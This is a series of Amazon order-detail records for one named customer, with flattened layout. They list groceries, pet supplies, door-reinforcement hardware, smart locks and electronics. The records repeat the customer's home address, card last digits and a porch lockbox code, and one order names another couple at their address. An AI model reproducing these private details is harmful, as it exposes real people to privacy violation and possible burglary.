Sink Strainer -Stainless Steel, Large Wide Rim 4.5" Diameter Sold by: Fengbao (seller profile) Price $6.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on February 8, 2019 Items Ordered Price 1 of: Electricians Gloves Large Klein Tools 40072 $22.04 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $29.03 Billing address BRIAN J COADY 1454 MONROE ST NW WASHINGTON, DC 20010 United States Total before tax: $29.03 Estimated tax to be collected: $1.32 Rewards Points:-$30.35 Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-6246694-9332201 Order Placed: February 5, 2019 Amazon.com order number: 114-6246694-9332201 Order Total: $22.95 Shipped on February 5, 2019 Items Ordered Price 1 of: Front Door Reinforcement | Door Armor | Anti Kick in Door Security | Door $22.95 Barrier | Door Hinge and Frame Reinforcement | Two Post Strike Plate | TUFF STRIKE Sold by: TUFF STRIKE Door Reinforcement and Repair Hardware (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $22.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $22.95BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$22.95 United States Credit Card transactions AmazonPLCC ending in 3157: February 5, 2019:$22.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5369093-0481855 Order Placed: February 5, 2019 Amazon.com order number: 114-5369093-0481855 Order Total: $44.67 Shipped on February 8, 2019 Items Ordered Price 1 of: Fix-A-Jamb Door Jamb Security Reinforcement and Frame Repair Kit for Interiors $31.14 -Aged Bronze Sold by: Amazon.com Services LLC Condition: New 2 of: Prime-Line U 9539 Armored Security Strike, 1-1/4 in. x 4-7/8 in., Steel, Brass $5.50 Plated Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $42.14 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $42.14 BRIAN J COADY Estimated tax to be collected: $2.53 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$44.67 United States Credit Card transactions AmazonPLCC ending in 3157: February 8, 2019:$44.67 Final Details for Order #114-1620864-8264208 Order Placed: January 30, 2019 Amazon.com order number: 114-1620864-8264208 Order Total: $139.98 Shipped on February 2, 2019 Items Ordered Price 1 of: TurboLock TL-99 Bluetooth Smart Lock for Keyless Entry & Live Monitoring – $59.99 Send & Delete eKeys w/App on Demand (Polished Brass) Sold by: Better Choice Online (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on January 31, 2019 Items Ordered Price 1 of: 2018 Material UpgradePINEWORLD Q100 Keypad Smart Lock, Digital $79.99 Security Keyless Door Knob,Electronic Keypad Deadbolt Easy to Install(Bluetooth,Silver Copper) Sold by: Pineworld Factory US (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $139.98 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $139.98 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010 Grand Total:$139.98 United States Credit Card transactions AmazonPLCC ending in 3157: February 2, 2019:$59.99 AmazonPLCC ending in 3157: January 31, 2019:$79.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-9224533-6135428 Order Placed: January 27, 2019 Amazon.com order number: 113-9224533-6135428 Order Total: $8.99 Shipped on January 28, 2019 Items Ordered Price 1 of: Cable USB C to USB C 6.6FT 2.0, Type C Cable Fast Charging Durable Leather High Speed Data Transfer Charger Cords Compatible Samsung Galaxy Plus Note 9 8, Google Pixel 2 3 XL, MacBook (White) Sold by: YiQiuLin LTD (seller profile) $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.99 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$8.99 United States Credit Card transactions AmazonPLCC ending in 3157: January 28, 2019:$8.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7695164-9041834 Subscribe and Save Order Placed: January 25, 2019 Amazon.com order number: 114-7695164-9041834 Order Total: $9.53 This order contains Subscribe & Save items. Shipped on February 3, 2019 Items Ordered 1 of: Swash 80240514 Pods Unwind Cups (12 Pack), Purple Sold by: Amazon.com Services LLC Price $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Chilled Shipping Payment information Payment Method: Item(s) Subtotal: $8.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $8.99BRIAN J COADY Estimated tax to be collected: $0.54 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.53 United States Credit Card transactions AmazonPLCC ending in 3157: February 3, 2019:$9.53 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8098409-1061867 Order Placed: January 11, 2019 Amazon.com order number: 114-8098409-1061867 Order Total: $45.50 Shipped on January 12, 2019 Items Ordered Price 1 of: Sugru Moldable Glue -Family-Safe | Skin-Friendly Formula -White 8-Pack $19.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 12, 2019 Items Ordered Price 1 of: Dap 21506 Plastic Wood Filler, 16-Ounce $7.89 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 11, 2019 Items Ordered Price 1 of: ThermoMorph -Moldable Plastic Pellets 8.8 oz (250g): Reheatable -Reusable -Remoldable -Crafting Plastic: Moldable Sculpting Plastic: Heat Pliable, Cool Hard Sold by: Fresher Products Limited (seller profile) $15.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $43.83 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $43.83 BRIAN J COADY Estimated tax to be collected: $1.671454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$45.50 United States Credit Card transactions AmazonPLCC ending in 3157: January 12, 2019:$21.19 AmazonPLCC ending in 3157: January 12, 2019: $8.36 AmazonPLCC ending in 3157: January 11, 2019:$15.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2439668-7622656 Order Placed: January 6, 2019 Amazon.com order number: 114-2439668-7622656 Order Total: $14.99 Shipped on January 6, 2019 Items Ordered Price 1 of: Dog Muzzles Suit, 7 PCS Anti-Biting Barking Muzzles Adjustable Dog Mouth Cover $14.99 for Small Medium Large Extra Dog Sold by: COOZERO (seller profile) Condition: New Shipping Address: Bryan and Sarah Suchomel 412 WESTCHESTER DR ROCKFORD, IL 61107-4758 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.99 United States Credit Card transactions AmazonPLCC ending in 3157: January 6, 2019:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3633747-9020237 Order Placed: January 6, 2019 Amazon.com order number: 114-3633747-9020237 Order Total: $14.99 Shipped on January 7, 2019 Items Ordered Price 1 of: Dog Muzzle,Soft Basket Silicone Muzzles for Dog, Best to Prevent Biting, Chewing $14.99 and Barking, Allows Drinking and Panting, Used with Collar (2 (Snout Sold by: Barkless Co.,Ltd (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.99 United States Credit Card transactions AmazonPLCC ending in 3157: January 7, 2019:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3221040-4526654 Subscribe and Save Order Placed: December 22, 2020 Amazon.com order number: 114-3221040-4526654 Order Total: $14.82 This order contains Subscribe & Save items. Shipped on January 7, 2021 Items Ordered 1 of: Instant Power 1510 Commercial Drain Cleaner, 1-Gallon Sold by: Amazon.com Services LLC Price $13.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $13.98Billing address Estimated tax to be collected: $0.84Brian J Coady 1454 Monroe St. NW Grand Total:$14.82 Washington, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: January 7, 2021:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1983701-5900239 Order Placed: December 24, 2020 Amazon.com order number: 111-1983701-5900239 Order Total: $0.00 Shipped on December 24, 2020 Items Ordered 1 of: ASURION 2 Year Personal Care Protection Plan $175-199.99 Sold by: Asurion, LLC (seller profile) Price $15.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $15.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Rewards Points Total before tax: $15.99Billing address Estimated tax to be collected: $0.96Brian J Coady Rewards Points:-$16.95 1454 Monroe St. NW Washington, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6677197-2117855 Order Placed: December 24, 2020 Amazon.com order number: 111-6677197-2117855 Order Total: $24.49 Shipped on December 28, 2020 Items Ordered Price 1 of: Braun Electric Razor for Men, Series 7 790cc Electric Shaver with Precision Trimmer, Rechargeable, Foil Shaver, Clean & Charge Station and Travel Case Sold by: Amazon.com Services LLC $179.94 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $179.94 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Rewards Points Total before tax: $179.94Billing address Estimated tax to be collected: $10.80Brian J Coady Rewards Points:-$166.25 1454 Monroe St. NW Washington, DC 20010 Grand Total: $24.49United States Credit Card transactions AmazonPLCC ending in 3157: December 28, 2020:$24.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6918462-5412213 Order Placed: December 28, 2020 Amazon.com order number: 111-6918462-5412213 Order Total: $156.36 Shipped on December 28, 2020 Items Ordered 1 of: GT's Kombucha, Gingerade 16 Fl Oz Sold by: Whole Foods Market (seller profile) Price $3.49 Condition: New 2 of: Deck Hand, Cat Food Tuna Shrimp, 3 Ounce, 3 Pack Sold by: Whole Foods Market (seller profile) $1.99 Condition: New 1 of: WORLD CENTRIC UTENSIL CORN STARCH ASRTD Sold by: Whole Foods Market (seller profile) $3.19 Condition: New 4 of: 365 by Whole Foods Market, Cheese Bar, Sharp Cheddar, 8 Ounce Sold by: Whole Foods Market (seller profile) $2.99 Condition: New 0.90 lb of: Dip Guacamole Conventional Sold by: Whole Foods Market (seller profile) ($6.99/lb $6.29 Condition: New 1 of: KeVita Master Brew Kombucha, Ginger, with Live Probiotics, 15.2 oz. Sold by: Whole Foods Market (seller profile) $3.29 Condition: New 1 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New 1 of: Preserve Plate Kitchen Supplies, Large, Apple Green Sold by: Whole Foods Market (seller profile) $6.99 Condition: New 2 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: Primal Kitchen -Chipotle Lime Avocado Oil Mayo, Gluten and Dairy Free, Whole30 and Paleo Approved (12 oz) Sold by: Whole Foods Market (seller profile) $7.39 Print this page for your records. 3.34 lb of: Pork Sausage Link Italian Spicy Step 1 ($6.99/lb Sold by: Whole Foods Market (seller profile) $23.35 Condition: New 1 of: Organic Valley Heavy Whipping Cream, 8 Ounce $2.49 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Wymans Of Maine, Blueberries Wild, 48 Ounce $14.99 Sold by: Whole Foods Market (seller profile) Condition: New 3 of: Whole Paws Salmon in Broth Canned Cat Food, 3 OZ $0.89 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: ParmCrisps, Sesame, 1.75 Ounce Bag $3.69 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Organic Walnuts, Halves & Pieces, 10 oz $8.99 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $148.21 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $148.21 Brian J Coady Estimated tax to be collected: $1.15 1454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00 United States Grand Total:$156.36 Credit Card transactions AmazonPLCC ending in 3157: December 30, 2020: $7.00 AmazonPLCC ending in 3157: December 28, 2020:$149.36 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-0384513-7316215 Subscribe and Save Order Placed: December 30, 2020 Amazon.com order number: 112-0384513-7316215 Order Total: $18.24 This order contains Subscribe & Save items. Shipped on January 7, 2021 Items Ordered Price 1 of: SHEBA PERFECT PORTIONS Soft Wet Cat Food Paté Savory Chicken Entrée and Roasted Turkey Entrée Multipack, Easy Peel Twin-Pack Trays, 48 Count Sold by: Amazon.com Services LLC $19.20 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.20 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.96 Billing address Total before tax: $18.24Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$18.24 United States Credit Card transactions AmazonPLCC ending in 3157: January 7, 2021:$18.24 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2982665-6257025 Subscribe and Save Order Placed: December 30, 2020 Amazon.com order number: 112-2982665-6257025 Order Total: $14.99 This order contains Subscribe & Save items. Shipped on January 7, 2021 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 Oz. $15.78 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.78 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.79 Billing address Total before tax: $14.99Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$14.99 United States Credit Card transactions AmazonPLCC ending in 3157: January 7, 2021:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4379550-9466607 Order Placed: December 30, 2020 Amazon.com order number: 111-4379550-9466607 Order Total: $47.58 Shipped on December 31, 2020 Items Ordered Price 1 of: New Beats Flex Wireless Earphones – Apple W1 Headphone Chip, Magnetic Earbuds, Class 1 Bluetooth, 12 Hours of Listening Time, Built-in Microphone -Black (Latest Model) Sold by: Amazon.com Services LLC $44.89 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $44.89 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $44.89 Brian J Coady Estimated tax to be collected: $2.691454 Monroe St. NW Washington, DC 20010 Grand Total:$47.58 United States Credit Card transactions Visa ending in 0222: December 31, 2020:$47.58 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6176758-8430627 Order Placed: December 30, 2020 Amazon.com order number: 111-6176758-8430627 Order Total: $9.11 Shipped on December 31, 2020 Items Ordered Price 1 of: Aukora E26 E27 Light Bulb Socket Extender, Bendable Medium Base Light Socket $8.59 Converter for Motion Sensor Light Bulb Standard LED Bulbs, Adjustable Ver Sold by: AukoraDirect (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $8.59 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $8.59Brian J Coady Estimated tax to be collected: $0.52 1454 Monroe St. NW Washington, DC 20010 Grand Total:$9.11 United States Credit Card transactions Visa ending in 0222: December 31, 2020:$9.11 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9847282-6392216 Order Placed: December 30, 2020 Amazon.com order number: 111-9847282-6392216 Order Total: $11.86 Shipped on December 31, 2020 Items Ordered Price 1 of: Smart Motion Sensor Light Bulbs, 3000K Warm White Built-in Motion Detector and Photocell Sensor, Automatic on/Off, Dusk to Dawn, A19/E26/120V/12W/1000 Sold by: Wixann (seller profile) $11.19 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $11.19 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $11.19Brian J Coady Estimated tax to be collected: $0.671454 Monroe St. NW Washington, DC 20010 Grand Total:$11.86 United States Credit Card transactions Visa ending in 0222: December 31, 2020:$11.86 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2433027-1561802 Order Placed: December 31, 2020 Amazon.com order number: 111-2433027-1561802 Order Total: $31.79 Shipped on January 3, 2021 Items Ordered 1 of: Braun Clean & Renew Refill Cartridges, 6 Count, Pack of 1 Sold by: Amazon.com Services LLC Price $29.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $29.99 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $29.99 Brian J Coady Estimated tax to be collected: $1.801454 Monroe St. NW Washington, DC 20010 Grand Total:$31.79 United States Credit Card transactions Visa ending in 0222: January 3, 2021:$31.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-9601602-9754626 Subscribe and Save Order Placed: December 9, 2020 Amazon.com order number: 112-9601602-9754626 Order Total: $17.42 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered 1 of: Nutramax Dasuquin Capsules, 84 Count Sold by: Amazon.com Services LLC Price $19.33 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.33 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.90 Billing address Total before tax: $16.43Brian J Coady Estimated tax to be collected: $0.991454 Monroe St. NW Washington, DC 20010 Grand Total:$17.42 United States Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$17.42 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9876006-8368236 Order Placed: December 10, 2020 Amazon.com order number: 114-9876006-8368236 Order Total: $180.58 Shipped on December 10, 2020 Items Ordered 1 of: Royal Asia, Sea Salt & Pepper Calamari, 10 oz (Frozen) Sold by: Whole Foods Market (seller profile) Price $6.99 Condition: New 1 of: Wellshire Farms, Beef Meatball Italian Gluten-Free Frozen , 16 Ounce Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: GT's Kombucha, Gingerade 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.36 Condition: New 1 of: Tabasco Original Red Pepper Sauce, 2 oz Sold by: Whole Foods Market (seller profile) $2.19 Condition: New 3 of: 365 by Whole Foods Market, Organic Sauce, Jalapeno Hot Sauce, 5 Fl Oz Sold by: Whole Foods Market (seller profile) $1.79 Condition: New 1 of: Whole Foods Market, Potsticker Edamame Bake 12 Count, 8 Ounce Sold by: Whole Foods Market (seller profile) $5.99 Condition: New 1 of: Lahtt Sauce Premium All Purpose Chili Oil Sauce, Vegan (Made with Shiitake Mushrooms), Hot Heat, Natural Non GMO Ingredients, Gluten-Free, No MSG, No Preservatives (1 Jar) Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.36 Condition: New 1.00 lb of: WHOLE FOODS MARKET General Tso's Soy Nuggets Sold by: Whole Foods Market (seller profile) ($11.99/lb $11.99 Condition: New 1 of: Whole Foods Market, Vegetable Potstickers, 8 ct, (Frozen) Sold by: Whole Foods Market (seller profile) $2.99 Print this page for your records. Condition: New 0.87 lb of: Dip Guacamole Conventional Sold by: Whole Foods Market (seller profile) ($6.99/lb $6.08 Condition: New 1 of: Herb Crusted Rotisserie Chicken, Chilled Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: 365 Everyday Value, Wild-Caught Breaded Fish Fillets, 12 oz (Frozen) Sold by: Whole Foods Market (seller profile) $5.99 Condition: New 3 of: 365 Everyday Value, Organic Berry Blend, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.39 Condition: New 3 of: Califia Farms -Keto Coffee Creamer, Unsweetened, 16.9 Oz, Almond Milk & Coconut Cream, Low Calorie, Zero Sugar & Carb, 500mg MCT, Non Dairy, Plant Based, Whole30, Shelf Stable Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Applegate, Natural Savory Turkey Breakfast Sausage Patties, 7oz (Frozen) Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1 of: Gts Living Foods, Kombucha Rose Berry Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.36 Condition: New 2 of: Wymans Of Maine, Blueberries Wild, 48 Ounce Sold by: Whole Foods Market (seller profile) $14.99 Condition: New 1 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1.01 lb of: Cherry Conventional, 1 Bag Sold by: Whole Foods Market (seller profile) ($7.99/lb $8.07 Condition: New 3 of: Epic, Pork Crackling Jalapeno, 2.5 Ounce Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: World Centric Corn Starch Spoons, 24-Piece Sold by: Whole Foods Market (seller profile) $3.19 Condition: New 1 of: 365 Everyday Value, Distilled Water, 128 fl oz Sold by: Whole Foods Market (seller profile) $0.89 Condition: New 1 of: 365 Everyday Value, Romaine Hearts Salad Bag Organic, 12 Ounce $3.49 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Organic Walnuts, Halves & Pieces, 10 oz $8.99 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $180.34 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $180.34 Brian J Coady Estimated tax to be collected: $0.241454 Monroe St. NW Washington, DC 20010 Grand Total:$180.58 United States Credit Card transactions AmazonPLCC ending in 3157: December 10, 2020:$180.58 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4924538-2562662 Order Placed: December 13, 2020 Amazon.com order number: 114-4924538-2562662 Order Total: $0.00 Shipped on January 29, 2021 Items Ordered Price 1 of: Echo Dot (3rd Gen) -Smart speaker with Alexa -Charcoal $24.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $24.99 Visa | Last digits: 0222 Shipping & Handling: $0.00 SiriusXM Promotion:-$24.99 Billing address ---- Brian J Coady 1454 Monroe St. NW Washington, DC 20010 Total before tax: Estimated tax to be collected: $0.00 $0.00 ---- United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5203190-7927423 Order Placed: December 19, 2020 Amazon.com order number: 114-5203190-7927423 Order Total: $63.51 Shipped on December 19, 2020 Items Ordered Price 1 of: Arm & Hammer For Pets Clump & Seal AbsorbX Clumping Litter, MultiCat, 15 lb $19.97 (Works Like 30 Pounds), Gray Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Rush Shipping Shipped on December 19, 2020 Items Ordered Price 1 of: Arm & Hammer For Pets Clump & Seal AbsorbX Clumping Litter, MultiCat, 15 lb $19.97 (Works Like 30 Pounds), Gray Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Rush Shipping Shipped on December 19, 2020 Items Ordered Price 1 of: Arm & Hammer For Pets Clump & Seal AbsorbX Clumping Litter, MultiCat, 15 lb (Works Like 30 Pounds), Gray Sold by: Amazon.com Services LLC $19.97 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Rush Shipping Payment information Payment Method: Item(s) Subtotal: $59.91 Visa | Last digits: 0222 Shipping & Handling: $2.99 Free Shipping: -$2.99 Billing address Brian J Coady Total before tax: $59.911454 Monroe St. NW Estimated tax to be collected: $3.60Washington, DC 20010 United States Grand Total:$63.51 Credit Card transactions Visa ending in 0222: December 19, 2020:$63.51 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6751202-5463407 Subscribe and Save Order Placed: December 20, 2020 Amazon.com order number: 114-6751202-5463407 Order Total: $27.13 This order contains Subscribe & Save items. Shipped on December 30, 2020 Items Ordered Price 1 of: C4 Original Sugar Free Sparkling Energy Drink Midnight Cherry | Pre Workout Performance Drink with No Artificial Colors or Dyes | 16oz (Pack of 12) Sold by: Amazon.com Services LLC $28.56 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.56 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.43 Billing address Total before tax: $27.13Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$27.13 United States Credit Card transactions Visa ending in 0222: December 30, 2020:$27.13 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6010638-6340254 Order Placed: December 22, 2020 Amazon.com order number: 113-6010638-6340254 Order Total: $0.00 Shipped on December 23, 2020 Items Ordered Price 1 of: Arm & Hammer For Pets Clump & Seal AbsorbX Clumping Litter, MultiCat, 15 lb (Works Like 30 Pounds), Gray Sold by: Amazon.com Services LLC $0.00 Condition: New Shipping 